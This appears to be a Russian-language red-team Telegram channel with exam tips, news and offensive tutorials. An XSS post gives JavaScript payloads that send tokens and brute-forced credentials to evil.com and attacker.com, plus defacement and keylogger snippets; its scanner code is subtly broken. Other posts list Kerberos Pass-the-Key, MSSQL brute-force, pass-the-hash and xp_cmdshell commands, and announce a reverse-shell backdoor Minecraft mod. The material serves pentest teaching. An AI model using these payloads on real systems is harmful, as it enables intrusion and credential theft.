« Всё это было только ради поста ( @pyfffe ) »

💥 Привет! А я тут 🔗 налутал HTB CPTS и спешу поделиться мыслями и лайфхаками по этому сертификату. Для начала несколько вступительных слов.

❓ Что там за задание?
Дан лабораторный стенд с эмуляцией инфраструктуры небольшой компании, с линуксами и виндовсоми. Цель — взломать и написать отчёт по проведению пентеста. Присутствует возможность полной перезагрузки стенда.

❓ Какие ограничения?
Дедлайн — 10 дней включительно (также входит одна попытка на пересдачу). В инструментах не ограничивают. Прокторинга нет. Шаблон для отчета дадут.

Теперь лайфхаки:

*️⃣ Во первых очень важно спланировать свое время. Может показаться, что 10 дней — это много, но в моём случае потребовалось тратить по 8-10 часов в день. Если же у вас нет столько свободного времени, можно использовать еще 10 дней из попытки пересдачи. Также выделите несколько дней на оформление отчета.

*️⃣ Перед началом сдачи подготовьте рабочее пространство. Убедитесь, что у вас работает то, о чем говорить нельзя, и сетевой VPN трафик до стенда не блокируется. Если его всё-таки блокируют, то есть два выхода:
1️⃣Первый - использовать предоставленный для сдачи экзамена Pwnbox (выделенную виртуальную машину с ParrotOS), но у него два основных минуса - это подключение по VNC через браузер, без возможности ctrl+c ctrl+v, и ограниченное время работы, из-за чего приходится перезапускать виртуалку. В общем, это не мой путь 💀
2️⃣Второй выход - это арендовать VPS, с которого будет работать OpenVPN к лабе, и работать через него. Больше гемора с настройкой, но удобнее и реалистичнее

*️⃣ Вы единственный пользователь стенда, а значит ничего не мешяет добавить туда такие вектора атак, которые неприменимы для обычных HTB-Коробок.

*️⃣ В отчете нужно будет показать все шаги компрометации так, чтобы это смогла повторить бабушка админа, поэтому логируйте каждый шаг взлома, Включая, к примеру, mimicatz.exe lsadump::sam и sharphound.exe -c All.

*️⃣ Лаба несложная, zero-day нет, Вся информация есть либо на HTB Academy, либо в гугле. Однако, тут много кроличьих нор, из-за чего необходимо досконально проверять каждый предположительный вектор атаки.

Ну вот вроде всё. У меня сдача заняла 9 дней, отчет проверяли 5 рабочих дней. Результатом доволен 👾

#redteam

Привет, друзья! 😻

Немного дружественного контента. Сегодня в 20:00 наш хороший товарищ и коллега Владимир Кочанов, с которым мы не раз обсуждали безопасность бизнеса, в том числе в рамках информационной безопасности, проведет стрим на тему: «Как понять, что пора создавать службу безопасности?»

Владимир поделится опытом и ответит на важные вопросы:

🔸 На каком этапе развития компании становится критично задуматься о безопасности?
🔸 Как донести до акционеров, что безопасность — это инвестиция, а не пустая трата?

Если думаете, как провести вечер, — рекомендуем присоединиться! 👍

🔗 Ссылка на стрим: https://t.me/sbprobiz?livestream

👨‍💻 Привет! В последнее время я все чаще наблюдаю в пентестах и багбаунти сдачу XSS-уязвимостей без подробного описания импакта от этой уязвимости, как будто достаточно показать, что отрабатывает функция alert и всплывает popup-окно с тестом “я хакер”. А при благоприятных условиях даже перехватить свою куку. Как следствие, такие репорты могут пометить низким приоритетом и закинуть в долгий ящик.

Я хочу осветить несколько необычных векторов атак, которые можно использовать при различных инъекциях в веб-страницу, помимо кражи сессии из кук.

1️⃣ Сначала база - CSRF. если на сайте с XSS присутствуют незащищённые аутентифицированные запросы, можно совершить их от имени пользователя. Также никто не запрещает помимо целевого ресурса бегать по внутренней сети пользователя. Вот пример сканера открытого порта 80 внутренней сети

async function checkPort(ip) {
  try {
    const controller = new AbortController();
    const timeout = setTimeout(() => controller.abort(), 2000); // Таймаут 2 секунды

    const response = await fetch(`http://${ip}`, {
      method: 'HEAD',
      signal: controller.signal
    });
    clearTimeout(timeout);

    if (response.ok) {
      fetch(`https://evil.com/open?ip=${ip}`);
    }
  } catch (e) {
  }
}

async function scanNetwork(startIP, endIP) {
  const start = "192.168.1."

  for (let octet= 1; octet<= 254; ipNum++) {
    const ip = start + String(octet)
    checkPort(ip); // Проверяем каждый IP
  }
}

// Запуск сканера
scanNetwork(startIP, endIP);

2️⃣ Если вместо куки сессия хранится в local/session storage и передается через заголовок Authorization, то при неправильной настройке CSP её тоже можно перехватить

fetch("https://evil.com/steal", {
  method: "POST",
  headers: {
    "Authorization": localStorage.getItem("authToken"),
  },
});

3️⃣ XSS - это инъекция кода, а значит можно использовать вычислительные ресурсы. Я видел вектор распределенной брутфорс-атаки, что-то наподобие ботнета. Как пример, при загрузке скрипта жертва получает список хостов, логинов и паролей и начинает их брутить из своего браузера.

 const attackServer = "https://attacker.com/report";
 // Список паролей можно подгрузить запросом к сайту злоумышленника
 const passwords = ["password123", "admin", "123456", "qwerty"];
  
  passwords.forEach(password => {
    fetch("https://mail.google.com/login", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({
        username: "admin", 
        password: password
      })
    })
    .then(response => {
      // Отправляем найденные креды
      if (response.status === 200) {
        fetch(attackServer, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ username: "admin", password: password })
        });
      }
    });
  });

<продолжение далее>

<продолжение>

4️⃣ Если обнаружена хранимая XSS где-то на главной странице, то можно сделать дефейс, то есть изменить содержание страницы и добавить лозунги про квадроберов, или просто сделать страницу нефункциональной:

<script>document.body.innerHTML="<h1>Этот сайт был взломан. Все данные пользователей скомпрометированы</h1>";</script>

5️⃣ Помимо дефейса можно внедрить свои рекламные баннеры. Такой вектор обычно используется вирусами на скомпрометированном компьютере пользователя, но можно и через HTML-Injection:

<div id="ad" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: white; z-index: 1000; display: flex; justify-content: center; align-items: center;">
  <div style="position: relative; background: #f9f9f9; padding: 20px; border: 1px solid #ccc; box-shadow: 0 0 10px rgba(0,0,0,0.2);">
    <div style="position: absolute; top: -10px; right: -10px; cursor: pointer;" onclick="document.getElementById('ad').remove();">❌</div>
    <h3>Special Offer!</h3>
    <p>Click below to learn more:</p>
    <a href="https://example.com" target="_blank">Learn More</a>
  </div>
</div>

6️⃣ Кейлоггер. Да, это тоже можно сделать, причем очень просто, через встроенный ивент onkeypress:

<script>
    var l = "";
    document.onkeypress = function (e) {
        l + e.key;
        console.log(l); // Можно отправлять каждый введенный символ на наш сервер
    }
</script>

Как-то так 👀
Цель этого поста — показать, что, несмотря на эволюцию браузеров за последние 10 лет, XSS-уязвимости всё еще могут наносить серьезный импакт.

#redteam

🎆 Привет!

Хотим рассказать про канал наших друзей (да, у нас такие есть) и коллег по цеху. Там вы найдете заметки про Ред и Блю тим, и в целом про техническую ИБ.

Приглашаем в RedBlue Notes

❤️ С Международным днём защиты информации! 🤩

В мире безопасности есть свои "синие" — те, кто держит защиту под контролем, "красные" — те, кто не даёт им расслабляться, "фиолетовые" — те, кто объединяет усилия первых двух, и даже "жёлтые" — всегда готовые внести свежие идеи и нестандартные подходы к безопасности. Это не просто работа, а целая палитра усилий, где каждый цвет добавляет что-то важное🥰. А Вместе мы создаём настоящую картину безопасности!

Пусть инструменты работают,
идеи сверкают, а времени на отдых всегда хватает. Спасибо всем, кто делает этот цифровой мир ярче и безопаснее! 🛡

#REDtalk

Всем привет! 😎

Часто слышу вопрос:

С чего начать путь в ИБ?

Друзья, ну очевидно же, что любому уважающему себя хацкеру надо начинать со взлома Пентагона😄! Но если без шуток, то начинать стоит с хорошей базы. Разберитесь, как устроены сети и ваши любимые тырнетики.

А чтобы не блуждать в потёмках и не хвататься за все подряд, делюсь с вами отличным ресурсом. Он подойдет как новичкам для старта, так и опытным специалистам для закрытия пробелов в знаниях:

🔗 Roadmap Cyber Security

На этом сайте вы найдете дорожную карту для специалистов по кибербезопасности, которая охватывает всё:

💻 Основы сетевых технологий

🛡 Криптографию

⌨️ Pentest

🖥 Методы защиты инфраструктуры и многое другое.

Ресурс обновлен для 2024 года, поэтому всё достаточно актуально и полезно.

Исследуйте, учитесь и уверенно двигайтесь вперед! Успехов на вашем пути! 💪

#blueteam #redteam

👨‍💻 Привет!

Представим ситуацию — Вы сидите, проводите пентест, и в какой-то момент к вам приходит злой заказчик и говорит, что вы положили его инфру. Вы опешили, всё отрицаете, ведь во время тестирования атаки не было деструктивных методов. Но заказчик всё не успокаивается, показывает логи, мол, вот, в это время на нас упало куча трафика.

И в этот момент очень пригодились бы логи всех действий во время проведения тестирования. Поэтому вот простой лайфхак, который автоматически будет записывать 90% действий и поможет понять, были ли пентестеры причастны к инциденту или нет.

1️⃣ Для начала стоит добавить дату и время при каждом выполнении команды в терминале. Для этого можно модифицировать промпт вашего командного интерпретатора.

Тут ничего сложного, открываем rc файл и меняем соотсутсвующую переменную.

zsh (kali linux): Заменить PROMPT в ~/.zsh_rc

PROMPT=$'%F{%(#.blue.green)}┌──%{$fg[yellow]%}[%D{%d.%m.%y} %D{%H:%M}]\n%F{%(#.blue.green)}├──${debian_chroot:+($debian_chroot)─}${VIRTUAL_ENV:+($(basename $VIRTUAL_ENV))─}(%B%F{%(#.red.blue)}%n'$prompt_symbol$'%m%b%F{%(#.blue.green)})-[%B%F{reset}%(6~.%-1~/…/%4~.%5~)%b%F{%(#.blue.green)}]\n└─%B%(#.%F{red}#.%F{blue}$)%b%F{reset} ' 

bash (kali linux): Заменить PS1 в ~/.bash_rc

PS1=$prompt_color'┌──[\D{%d.%m.%Y %H:%M}]\n'$prompt_color'├──${debian_chroot:+($debian_chroot)──}${VIRTUAL_ENV:+(\[\033[0;1m\]$(basename $VIRTUAL_ENV)'$prompt_color')}('$info_color'\u'$prompt_symbol'\h'$prompt_color')-[\[\033[0;1m\]\w'$prompt_color']\n'$prompt_color'└─'$info_color'\$\[\033[0m\] ';; 

Теперь в листинге каждая команда будет иметь дату и время начала и конца выполнения (как на скриншоте к посту)

2️⃣ Далее нужно настроить автоматическую запись листинга. Тут на помощь придет TMUX. Правильно настроенный терминальный мультиплексор может стать мощным инструментом по сравнению с ГУИшными терминалами.

Для записи истории команд нужно установить плагин и добавить конфигурацию при каждом запуске tmux.

$> git clone https://github.com/tmux-plugins/tpm ~/.tmux/plugins/tpm 
 
# Конфиг должен выглядить так 
$> cat .tmux.conf  
 
# Список плагинов 
set -g @plugin 'tmux-plugins/tpm' 
set -g @plugin 'tmux-plugins/tmux-sensible' 
set -g @plugin 'tmux-plugins/tmux-logging' 
set -g history-limit 500000 
 
# Запуск Tmux Plugin Manager 
run '~/.tmux/plugins/tpm/tpm' 
 
$> tmux source ~/.tmux.conf 

Осталось зайти в tmux и нажать CTRL + b и SHIFT + i. Теперь при каждом запуске tmux можно начать запись с помощью CTRL + b, SHIFT + p и сразу после выхода из терминала запись будет сохранена в домашнюю директорию в виде текстового файла.

Теперь мы точно будем уверены, что во время инцидента со стороны пентестеров активности не было и мы не в чем не виноваты. Конечно, листинг команд работает только для CLI. С GUI нужно разбираться отдельно.

#redteam #ToolTricks

Привет, друзья! 🤩

У нас для вас крутая новость🚀! Сегодня в 20:00 наш хороший товарищ Владимир Кочанов проведет стрим на тему: «Руководитель — как им стать?»

Вас ждёт разбор актуальных и интересных вопросов:

❕ Какие софт скиллы нужны, чтобы стать успешным руководителем?

❕ Как найти общий язык с коллегами разных поколений?

❕ Отличаются ли подходы к управлению в разных отделах?

❕ Что делает функцию СБ (службы безопасности) особенной?

Если хотите провести вечер с пользой — присоединяйтесь 🔥! Будет интересно и полезно для всех, кто стремится к развитию и лидерству.

👉 Ссылка на стрим: https://t.me/sbprobiz?livestream

Сегодня вспомним о защите...
А точнее о Protected Users, вспомним в контексте пентеста конечно😎
Ну и не забудем про PTK (ай, спойлеры😐)

Обычно, когда в ходе пентеста мы видим УЗ с одинаковыми (похожими) ФИО, но разными правами в домене (особенно, если вторая УЗ - админ домена), первое, что приходит в голову: сейчас реюзнем пароль и заовним эти ваши актив директори🙏
Довольные идём в netexec, делаем Pass-The-Hash и получаем STATUS_ACCOUNT_RESTRICTION 😐

Как все было легко, если бы не Protected Users👀
В чем соль защиты:
▪️Учетные данные защищенных пользователей не будут кэшироваться (да, дамп LSASS вам больше не поможет).
▪️Для защищенных пользователей аутентификация Kerberos не будет генерировать ключи DES или RC4, а также не будет кэшировать текстовые учетные данные или долгосрочные ключи после первоначального получения Ticket-Granting Ticket (TGT) (да, с использованием NTLM тикет не запросить).
▪️NTLM и одноразовая функция NTLM (NTOWF) заблокированы (*грустный вздох*).

Контра: использование AES ключа и Pass-The-Key.🎸
Да, придется делать эскалацию в домене и при помощи, например, УЗ с DCsync получать ключик админа домена с домен контроллера👀

Обещанная напоминашка по PTK😶:
Pass The Key (PTK) предназначена для сред, в которых традиционный протокол NTLM ограничен, а приоритет отдается аутентификации Kerberos. Эта атака использует NTLM-хэш (в нашей ситуации не подходит) или AES-ключи (то, что нужно) пользователя для получения билетов Kerberos, что позволяет получить несанкционированный доступ к ресурсам в сети.

Команда для линуха:

impacket-getTGT DOMAIN/username -aesKey KEY

Команда для винды:

.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec

Как-то так, защищайте своих админов домена, но мы все равно придём за ними 😒

#redteam

🎄 С наступающим 2025 годом от команды REDtalk! 🎉

Друзья, год подходит к концу, и мы хотим искренне поблагодарить каждого из вас за поддержку, активное участие и интерес к теме информационной безопасности! Вы вдохновляете нас делиться знаниями и вместе строить сообщество профессионалов, где каждый может узнать новое, обсудить идеи и обменяться опытом. 🥰

В 2025 году команда REDtalk готовит для вас ещё больше полезного контента. Давайте вместе продолжать расти, учиться и вдохновляться! 🚀

Желаем вам в новом году профессиональных побед, надёжной защиты, захватывающих проектов и, конечно, личного счастья, здоровья и новых ярких впечатлений! Пусть 2025 год станет временем новых возможностей и достижений! 🥂

Спасибо, что вы с нами. Оставайтесь на связи — впереди только лучшее!

С Новым годом! 🎆
Ваша команда REDtalk ❤️

#REDtalk

👨‍💻 Привет!

Всё в порядке, мы живы. Начинаем вкатываться в новый год.

Допустим у нас есть внешний сервер для проведения пентестов, редтимов и всего этого, и мы хотим его спрятать от посторонних глаз ботов и сок-аналитиков. Звучит просто, но что, если на сервере висит открытый порт? Как с ним быть?

1️⃣ Начну с пинга. По умолчанию популярные linux-дистрибутивы имеют службу, отвечающую за обработку ICMP-пакетов.
Убрать это просто. Достаточно добавить правило блокировки пакетов в межсетевой экран

nft add rule inet filter input icmp type echo-request drop  

2️⃣ Порты. Нужно постоянно держать в голове, что 24/7 по нашему серверу бегают боты и сканеры.

Для начала на всякий случай стоит добавить правила на дроп всех соединений. VPS-провайдеры любят вместе с дистрибутивом ставить какой-нибудь агент заббикса. В этом случае лучше написать правила на блокировку всего трафика и потом по мере необходимости добавлять белые списки:

# Очистка текущих правил 
sudo nft flush ruleset

# Создание таблицы и цепочек 
nft add table inet filter 
nft add chain inet filter input { type filter hook input priority 0; policy drop; } 
nft add chain inet filter output { type filter hook output priority 0; policy drop; } 
nft add chain inet filter forward { type filter hook forward priority 0; policy drop; }

# Исключение для lo  
nft add rule inet filter input iif lo accept 
nft add rule inet filter output oif lo accept

# Разрешение трафика для 22/tcp порта 
nft add rule inet filter input ct state established,related accept 
nft add rule inet filter output ct state established,related accept 
nft add rule inet filter input tcp dport 22 ct state new accept 
nft add rule inet filter output tcp sport 22 accept 
nft list ruleset > /etc/nftables.conf 
 

Для скрытия открытого порта достаточно переместить его на нестандартный (например, tcp/64022 вместо tcp/22). Это можно сделать, не изменяя конфигурацию сервиса, на котором открыт сокет:

nft add chain ip nat prerouting { type nat hook prerouting priority 0; } nft add chain ip nat postrouting { type nat hook postrouting priority 100; } 
nft add rule ip nat prerouting tcp dport 64022 dnat to :22

Или, если не хочется возится с правилами, можно использовать socat:

socat TCP-LISTEN:64022,fork TCP:localhost:22 

Но можно сделать еще лучше — фильтровать соединения от всех IP-адресов, которые не выполнили заданные условия. Я сделал для этого небольшой 🔗 PoC (гифка оттуда), использующий nftables для фильтрации и временной разблокировки конкретного адреса ко всем портам, если с него поступил HTTP-запрос. Есть также 🔗 похожее популярное решение . Таким образом боты и аналитики soc не смогут увидеть открытый порт, так как не придет TCP SYN+ACK пакет.

👍 Привет, коллеги!

Новая рабочая неделя только начинается, а мы предлагаем вам оглянуться назад, чтобы обсудить ключевые события из мира ИБ за прошедшую неделю.

📌 Утечка данных «Ростелекома»

21 января стало известно об утечке данных, связанной с крупнейшим российским оператором связи «Ростелеком». «Ростелеком» сообщил, что инцидент произошёл не в их собственной IT-инфраструктуре, а в системе подрядчика, который оказывает услуги компании, а также ранее уже подвергался кибератакам.
На данный момент известно, что утечка не затронула особо чувствительные данные, такие как финансовая информация клиентов или их пароли. Однако общий объём информации, попавшей в открытый доступ, всё же вызывает вопросы, особенно в контексте возможного использования этих данных в фишинговых атаках.
Утекли 154 тысячи электронных почт и более 100 тысяч телефонных номеров.

📌 PoC для уязвимости в Windows (CVE-2024-49138)

Опубликован PoC для уязвимости CVE-2024-49138. Напомним, что проблема была обнаружена в драйвере Windows Common Log File System (CLFS), который отвечает за работу системных журналов. Данная уязвимость позволяет получить привилегии system на хосте.
Патч естественно на месте.
А также ссылка на PoC.

📌 Критическая уязвимость в Windows OLE (CVE-2025-21298)

Обнаружена уязвимость в Windows OLE (Object Linking and Embedding), позволяющая выполнять произвольный код через специально созданные файлы. Вектором атаки могут быть phishing-рассылки. Открытие или предварительный просмотр письма в Microsoft Outlook может инициировать удалённое выполнение кода без какого-либо действия со стороны пользователя.
Патч от Microsoft уже доступен, и его установка — первый шаг.
Но помимо этого, рекомендуется отключить предварительный просмотр сообщений и настроить отображение писем в виде обычного текста для снижения риска эксплуатации, а также внедрить песочницы для проверки подозрительных вложений и уделить внимание обучению сотрудников основам иб.
Ссылка на POC

Что делать 😤 ?

Вывод очевиден: системы требуют обновлений, SOC – бдительности, а подрядчики – постоянной проверки. И да, помните: в ИБ расслабляться нельзя. 💪

🤩 Всем хорошей продуктивной недели! Подписывайтесь, чтобы не пропустить главное!

🙂 Как вам такой формат новостей, друзья?

#news

Привет, коллеги!

Выходные подходят к концу, а значит, самое время подвести итоги недели 🥺

🥺 Утечка данных DeepSeek

Исследователи Wiz Research обнаружили открытую базу данных ClickHouse китайской нейросети DeepSeek. Она была доступна без аутентификации и содержала:

🔹 Историю чатов пользователей,
🔹 API-ключи,
🔹 Внутренние конфигурационные файлы.

Серверы oauth2callback.deepseek.com:9000 и dev.deepseek.com:9000 позволяли свободно просматривать эти данные. После уведомления компания закрыла доступ.

🔗 Подробнее: Wiz Research


💀Критические уязвимости в ядре Linux

Опубликованы PoC для CVE-2024-56614 и CVE-2024-56615
Две критические уязвимости обнаружены в ядре Linux в механизме eBPF/XDP, который отвечает за высокопроизводительную обработку сетевых пакетов. Обе позволяют перезаписывать память ядра, что может привести к выполнению произвольного кода с правами root.

В чём проблема?
Ошибка связана с некорректным сравнением индексов элементов в массиве (signed int vs unsigned int) в функциях:

CVE-2024-56614 → xsk_map_delete_elem() (XSKMAP)
CVE-2024-56615 → dev_map_delete_elem() (DEVMAP)

В обоих случаях это приводит к выходу за границы памяти ядра (Out-of-Bounds Write) и возможности эскалации привилегий.

🔗 Ссылки на PoC:
🔹 CVE-2024-56614
🔹 CVE-2024-56615


💀Уязвимость в Apple CoreMedia (CVE-2025-24085)

Эта уязвимость типа "use-after-free" в компоненте CoreMedia, который отвечает за обработку медиа (видео и аудио ) на яблочных устройствах, позволяла вредоносным приложениям повышать привилегии.

Apple выпустила обновления для:

📱 iOS 18.3, iPadOS 18.3
💻 macOS Sequoia 15.3
⌚️ watchOS 11.3
📺 tvOS 18.3
🕶 visionOS 2.3

По словам представителей Apple, уязвимость могла активно эксплуатироваться против версий iOS до 17.2. Патч доступен с 27 января на всех яблочках.

Обновления также устраняют множество других уязвимостей, включая:
CVE-2025-24137: уязвимость типа "type confusion" в AirPlay, которая позволяла удаленному злоумышленнику вызвать неожиданное завершение приложения или выполнить произвольный код.

CVE-2025-24145: уязвимость, которая позволяла получить доступ к номеру телефона юзера через системные журналы.

CVE-2025-24107 и CVE-2025-24159: ошибки в ядре, которые позволяли вредоносному приложению получить root-привилегии.

CVE-2025-24128: уязвимость в Safari, которая связана с возможностью подмены адресной строки. При посещении специально созданного вредоносного сайта злоумышленник мог изменить отображаемый в адресной строке URL, вводя пользователя в заблуждение относительно подлинности сайта.

🔗 Подробнее: support.apple.com

Желаем вам хорошей и продуктивной предстоящей недели! Берегите данные и нервы 😡!

Добрый день, коллеги! ☕️

Новая неделя в самом разгаре. Предлагаем вам налить себе чашку кофе и вспомнить с нами события прошедшей недели!


💀Атаки на IIS с использованием публичных ASP. NET Machine Keys

🔍 Microsoft Threat Intelligence обнаружила более 3,000 утекших ASP. NET machine keys, которые злоумышленники используют для атак на IIS-серверы. Эти ключи, найденные в публичных репозиториях и документации, позволяют атакующим выполнять ViewState-инъекции и разворачивать Godzilla Malware.

Как работает атака?

1️⃣ViewState отвечает за сохранение состояния страниц в ASP. NET.
2️⃣ Для его защиты используются ValidationKey и DecryptionKey.
3️⃣Если эти ключи утекли, атакующие создают вредоносный ViewState и отправляют его на сервер.
4️⃣ IIS доверяет ViewState и выполняет код с привилегиями веб-приложения.

Рекомендации от Microsoft:

✅ Не используйте публичные machine keys — генерируйте уникальные ключи.
✅ Проверяйте свои ключи по базе хешей публичных ключей
✅ Ротируйте machine keys — регулярное обновление снижает риск компрометации.
✅ Обновите ASP. NET до 4.8 и включите Antimalware Scan Interface (AMSI).

Подробнее об уязвимости и защите — Microsoft Blog


⌨️Разбор LPE-уязвимости в AnyDesk

В сети опубликован анализ уязвимости в AnyDesk (CVE-2024-12754), позволяющей локальному злоумышленнику повысить привилегии до NT AUTHORITY\SYSTEM.

Как это работает?

Когда пользователь инициирует новую сессию, сервис AnyDesk копирует фоновое изображение рабочего стола в C:\Windows\Temp\, сохраняя оригинальное имя файла. Но поскольку низкопривилегированные пользователи могут создавать файлы в этой директории, атакующий может заранее создать файл с тем же именем. В результате служба AnyDesk перезаписывает этот файл с системными привилегиями, передавая злоумышленнику полный контроль.

💻Для любителей покопаться в деталях, ребята из @RedTeambro подготовили Proof-of-Concept, который можно найти здесь: POC

📖 Подробный разбор уязвимости можно найти здесь: LPE AnyDesk research


🛡Обновление безопасности Android

Google выпустила обновление безопасности для Android, устраняющее 47 уязвимостей, многие из которых являются критическими.

Наиболее критичные уязвимости:

CVE-2024-53104: Уязвимость высокой степени опасности в драйвере USB Video Class (UVC) ядра Linux. Проблема связана с некорректной обработкой видеокадров, что приводит к записи данных за пределами допустимых границ в функции uvc_parse_format(). Это позволяет злоумышленникам повышать привилегии, выполняя произвольный код или вызывая сбои устройства.

CVE-2024-45569: Критическая уязвимость в компонентах WLAN от Qualcomm с оценкой CVSS 9.8. Она связана с повреждением памяти из-за неправильной проверки индексов массива при обработке сетевых управляющих кадров, что может привести к удаленному выполнению кода.

Обновление доступно для устройств Google Pixel и будет постепенно распространяться на устройства других вендоров.

Подробнее ознакомиться с обновлением можно здесь


Всем продуктивной и насыщенной недели! Оставайтесь с нами. В ближайшее время добавим для вас больше разнообразного контента!

#news

😎 Привет!
Сначала я хотел оформить этот материал в виде статьи, но думаю, поста будет достаточно.

Я тут недавно заинтересовался темой доставки малварей через игры, в частности, через Minecraft, и прифигел от их количества. Думаю, не для кого не новость, что тем или иным образом возможно вставить вредоносный код внутрь исходного кода, например, невнимательным апрувом пул-реквеста, и он сохранится в последующих версиях, до момента обнаружения. Но в нашем случае всё гораздо легче.

Вернемся к майнкрафту. Так уж получилось, что на самую продаваемую игру в мире сделано самое большое количество модов. А мы знаем, что чем популярнее платформа, тем больше внимания на нее обращают хацкеры. В интернете полно историй про взлом клиентов и серверов через Minecraft, я даже как-то делал пост на эту тему.

Так вот, я решил создать 🔗 мод, который покажет неосведомленным пользователем, почему нехорошо качать модпаки со случайных источников. Сейчас в моде присутствует безобидный бекдур с реверс шеллом на 127.0.0.1 31337/tcp, а также чат-команда /reverseshell для создания шелла на заданный адрес. В будущем предполагается добавить побольше интересных нагрузок и красивый интерфейс внутри игры, но без импакта пользователю (если, конечно, он сам этого не захочетXD)

🙂Привет, друзья!

На собеседованиях я часто спрашиваю про абьюз Microsoft SQL Server, и, к моему удивлению, многие знают о нём поверхностно. А ведь MSSQL широко используется в корпоративных сетях и при неправильной настройке может стать удобной точкой входа для атакующего.

В этом посте я постарался собрать основные техники абьюза MSSQL, которые помогут лучше понять возможные векторы атак, подготовиться к собеседованию и собрать ваши знания воедино.

📖 Немного теории

Microsoft SQL Server (MSSQL) — это реляционная СУБД от Microsoft, активно используемая в корпоративных сетях для хранения и обработки данных.

Основные компоненты:
🔹 Database Engine — отвечает за хранение, обработку и управление данными.
🔹 SQL Server Agent — автоматизация задач (например, резервное копирование).
🔹 SQL Server Browser — помогает клиентам находить MSSQL-инстансы.
🔹 SSIS (SQL Server Integration Services) — инструмент для интеграции данных.
🔹 SSRS (SQL Server Reporting Services) — генерация отчетов.
🔹 SSAS (SQL Server Analysis Services) — аналитика и обработка данных.

Основные роли в MSSQL:
🔹 sysadmin — полные привилегии на сервере.
🔹 db_owner — полные права в конкретной базе данных.
🔹 db_datareader — доступ только на чтение данных.
🔹 db_datawriter — возможность изменять данные.
🔹 public — назначается всем пользователям по умолчанию и может давать больше доступа, чем кажется.

Способы аутентификации:
🔹Windows Authentication — через доменную аутентификацию (NTLM/Kerberos).
🔹 SQL Authentication — локальные учетные записи MSSQL (sa, пользовательские логины).


Обнаружение MSSQL в сети

Прежде чем “что-то” ломать, нам это “что-то” надо найти.

#PowerUpSQL
Get-SQLInstanceDomain

#nmap
nmap -p 1433 --script ms-sql-info <IP>

#Metasploit
auxiliary/scanner/mssql/mssql_ping

#go-windapsearch
go-windapsearch -d domain.local -u Administrator -p 'password1111' -m custom --filter="(&(objectClass=computer)(servicePrincipalName=*MSSQLSvc/*))" --attrs cn,servicePrincipalName
​

🥰 Доступ к MSSQL

#brute force
hydra -L users.txt -P pass.txt <IP> mssql
netexec mssql <target-ip> -u username -p passwords.txt

#password spraying
netexec mssql example.com -u usernames.txt -p 'password' --no-bruteforce --continue-on-success

#Pass-the-Hash
netexec mssql example.com -u usernames.txt -H <NTLM_HASH> --continue-on-success

impacket-mssqlclient DOMAIN/user@IP -hashes <YourHash>  
​

🤪 Повышение привилегий: от локального админа до sysadmin

Основной процесс SQL Server — это sqlservr.exe. Даже если у учетной записи SQL Server в Windows нет высоких привилегий, в самом SQL Server она по умолчанию получает роль sysadmin.

Компрометация службы SQL Server может привести к компрометации всего домена!

Шаг 1: Найдём локальный SQL Server.

# PowerUpSQL
Get-SQLInstanceLocal

Шаг 2: Получаем учетную запись SQL Server

#PowerUpSQL
Invoke-SQLImpersonateService -Verbose -Instance your_instance_name

​
🤗 Выполнение команд в OS через MSSQL

Злоумышленник, имея доступ к MSSQL, может выполнить команды Windows на сервере. Может он это сделать следующими способами:

🔹CLR (Common Language Runtime) Assembly — это механизм в Microsoft SQL Server, который позволяет выполнять .NET-код (C#, VB.NET, etc.) внутри базы данных.

#PowerUpSQL
Invoke-SQLOSCLR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"

​
🔹OLE Automation Procedures — это механизм в Microsoft SQL Server, который позволяет запускать объекты COM (Component Object Model) напрямую из T-SQL.

#PowerUpSQL
Invoke-SQLOSOle -Username sa -Password Pass123 -ServerInstance <IP> -Command "whoami"

​
🔹xp_cmdshell - встроенная хранимая процедура в Microsoft SQL Server, которая позволяет выполнять команды Windows напрямую из T-SQL

#SQL Server CLI
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';

#PowerUpSQL
Invoke-SQLOSCmd -Username sa -Password sa -Instance your_instance_name -Command "whoami"